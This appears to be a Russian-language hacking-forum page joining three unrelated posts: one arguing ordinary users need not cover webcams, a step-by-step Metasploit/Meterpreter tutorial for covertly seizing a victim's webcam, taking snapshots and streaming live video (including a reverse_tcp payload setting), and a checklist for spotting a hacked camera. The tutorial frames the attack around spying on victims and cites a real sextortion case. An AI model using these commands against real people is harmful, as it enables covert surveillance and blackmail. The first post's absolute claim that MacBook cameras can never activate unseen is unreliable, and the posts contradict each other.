Search the Community

Приветствую, хакеры! Известный факт: Марк Цукерберг заклеивает веб-камеру и микрофона ноутбука изолентой. Также делает глава ФБР Джеймс Коми и многие другие известные люди. Но если вы обычный человек — это не имеет большого смысла. Хакеры не будут тратить время специально на вас, а единственный риск — подцепить вирус где-нибудь на торрентах или в поисках эксклюзивного порно. Не ходите по таким сайтам и используйте хороший антивирус. Ещё один совет: следите за световым индикатором. Например, на некоторых Windows-ноутбуках были прецеденты, когда веб-камера включалась без светового индикатора. Но это очень маловероятно: для этого нужно, чтобы кто-нибудь всерьёз заинтересовался вами. А если у вас MacBook — вам бояться нечего. Там на уровне железа всё устроено так, что веб-камера никогда не включится без светового индикатора. Это невозможно. Больше того: заклеивать веб-камеру — вредно. Конструкция ноутбука не рассчитана на изоленту и её альтернативы. Например, в Apple оставляют минимальные зазоры между деталями на всех макбуках — там нет места изоленте. Если же вы её наклеили, рискуете сломать функцию автоматической регулировки яркости или цветовой баланс. Коротко. Если вы страшный параноик, CEO Facebook или глава ФБР — вероятно, вам стоит заклеить вебку. Но если вы обычный человек и действуете рационально, то ответ — нет. Просто поглядывайте за световым индикатором и не ходите по сомнительным сайтам.

В этом уроке мы рассмотрим, как мы можем взломать веб-камеру тайно и удаленно через интернет и взглянуть на то, что происходит на другой стороне. Мы используем мощный Meterpreter и Kali Linux, чтобы взломать веб-камеру жертвы. Мы возьмем под полный контроль веб-камеру, включим ее, сделаем снимки и даже будем транслировать видео в прямом эфире, чтобы никто никогда не узнал. В начале 2014 года хакер был приговорен к 18 месяцам за то, что сделал именно это с Miss Teen USA 2013. Он нашел уязвимость в ее компьютере, сделал несколько компрометирующих фотографий с веб-камеры и шантажировал жертву. Метод, который он использовал, - это именно то, что мы испытаем здесь. Наш лучший друг meterpreter собирается помочь нам с этим взломом. С помощью Meterpreter мы можем управлять чьей-то веб-камерой, устанавливать кейлоггер или устанавливать собственные вирусы, красть личные данные и делать практически все, что угодно на компьютере жертвы. В этом уроке я предполагаю, что Вы уже использовали модуль атаки для использования уязвимости с помощью Metasploit. А теперь давайте перейдем к делу. Как взломать веб-камеры? Шаг 1: Настройка meterpreter. После того, как мы успешно эксплуатировали жертву, у нас теперь есть возможность установить полезную нагрузку по нашему выбору. Полезная нагрузка сообщает metasploit, что делать на компьютере жертвы, как только он взломает. Meterpreter-это наш груз. Следующая команда настраивает нашу полезную нагрузку: set payload windows/meterpreter/reverse_tcp Если атака прошла успешно, metasploit автоматически устанавливает meterpreter на целевую систему, и мы можем перейти к взлому веб-камеры. Шаг 2: Найдите веб-камеру. Meterpreter имеет встроенный модуль для поиска и управления веб-камерой удаленной системы. Мы можем начать с поиска, если в системе вообще есть веб-камера или not.me. Для этого используется приведенная ниже команда, которая также возвращает нам название веб-камеры. meterpreter > webcam_list А теперь вы должны увидеть веб-камеры вашей цели, перечисленные в выходных данных. Шаг 3: Сделайте снимки Если последняя команда дала нам веб камеру мы можем пойти дальше и сделать снимок: meterpreter > webcam_snap А теперь вы должны увидеть, что картинка была сохранена в папке /opt/framework3/msf3 просто зайдите туда Шаг 4:Потоковое видео в реальном времени с взломанной веб-камеры Итак, мы просто сфотографировались, давайте посмотрим, как получить прямую видеотрансляцию. Мы можем сделать это, введя следующую команду: (мы используем параметр –p, чтобы указать каталог, который мы хотим предоставить файлу потоковой передачи видео) meterpreter > run webcam -p /var/www Эта команда запускает веб-камеру жертвы и отправляет ее видеовыход на /var/www/webcam.htm. Вы можете открыть этот файл и посмотреть, что происходит на другом конце в прямом видеопотоке. Как предотвратить взлом вашей собственной веб-камеры? Существует несколько способов взлома веб-камер. В приведенном выше примере с помощью всего лишь нескольких небольших команд мы можем заглянуть в веб-камеру нашей жертвы. Любой опытный специалист по безопасности скажет вам, что ни одна система не является полностью безопасной. Вот почему вы всегда должны держать свои камеры закрытыми, когда они не используются. Лично я заклеиваю камеру как на своем ноутбуке, так и на смартфоне. Но это не значит, что Вы не должны беспокоиться о том, чтобы об обновлении системы. Если хакер может получит контроль над вашей веб-камерой, ваша система была успешно использована, теперь она фактически является ботом, рабом злоумышленника. Это означает, что злоумышленник может сделать все, что угодно в вашей системе: получить доступ к вашим личным данным, увидеть все, что вы вводите, а также все веб-сайты, которые вы посещаете. Какое устройство вы используете прямо сейчас? Смартфон? Ноутбук? Скорее всего, вы смотрите прямо в камеру. Вы вдруг почувствовали себя немного неловко? Вы должны. Не принимайте никаких шансов. Если вы просто закрываете свои камеры и регулярно обновляете все свое программное обеспечение, вы можете избежать того, чтобы стать жертвой взлома веб-камеры самостоятельно. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

Всем привет, бывают случаи, когда ваши веб-камеры подвергаются взлому и злоумышленники могут начать слежку за вами. В этой статье я хочу поделиться тремя пунктами, с помощью которых вы сможете определить, взломана ли ваша камера. Меньше слов, больше дела! 1.Проверьте используемые приложения Довольно часто случается так, что камера управляется каким-либо сторонник приложением. Это происходит после того, как на ваш компьютер попадает вредоносное ПО, которое как раз-таки и перехватывает управление над вашей системой. Чтобы узнать это вам будет нужно включать веб-камеру. Если появиться уведомление о том, что приложение уже используется, то это значит, что над ним получила контроль другая программа. Поэтому проверяем все приложения, которые имеют разрешения на управление камерой. 2. Использование сканеров для вредоносного ПО Пришло время, чтобы основательнее разобраться с теми приложениями, которые используют вашу камеру. Для этого мы должны запустить наш компьютер в безопасном режиме, после чего прогнать систему через антивирус. Если же ничего не будет найдено, то можно использовать встроенный сканер в Гугл Хроме, обычно базы данных там самые свежие. 3. Проверьте камеру на предмет аномального поведения Прогресс не стоит на месте, поэтому каждый день как и вся техника, веб-камеры получает огромное количество нового функционала. Поэтому в таких ситуациях нужно обращать внимание на каждую мелочь, которая поможет вам вовремя обнаружить угрозу. Обращайте внимание на любой шум, мигание или движение камеры. Все это может говорить о том, что ваше устройство взломано. 4. Проверка настроек безопасности камеры Стоит обратить внимания на настройки безопасности, так как ваши данные могут быть украдены. Поэтому если вы заметили какой-то из этих пунктов, то стоит задумать и что-то предпринять: Пароль поменялся на стандартныйНевозможность изменения настроекФаервол, который был необходим для защиты камеры, отключенИмя пользователя, имеющего учетную записать администратора, изменено. Конечно, это не полный список, проверить стоит и другие мелочи. 5. Проверить интенсивность трафика Поток информации в сети может сказать на, как сильно мы используем ресурсы нашего интернета. Повышения интенсивности трафика может говорить о том, что данные передаются на “лево” без вашего предупреждения. Проверить это можно в диспетчере задач.